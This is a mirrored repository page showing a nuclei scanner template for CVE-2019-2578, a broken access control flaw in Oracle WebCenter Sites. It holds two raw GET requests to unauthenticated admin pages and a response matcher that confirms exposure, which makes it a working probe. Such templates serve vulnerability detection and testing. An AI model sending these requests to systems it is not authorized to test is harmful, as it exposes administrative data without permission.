daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-2578.yaml

36 lines
1.1 KiB
YAML
Raw Blame History

id: CVE-2019-2578
info:
name: Oracle WebCenter Sites - Broken Access Control
author: leovalcante
severity: high
description: Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2019-2578
tags: cve,cve2019,oracle,wcs,auth-bypass
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/05/04
Reference in New Issue View Git Blame Copy Permalink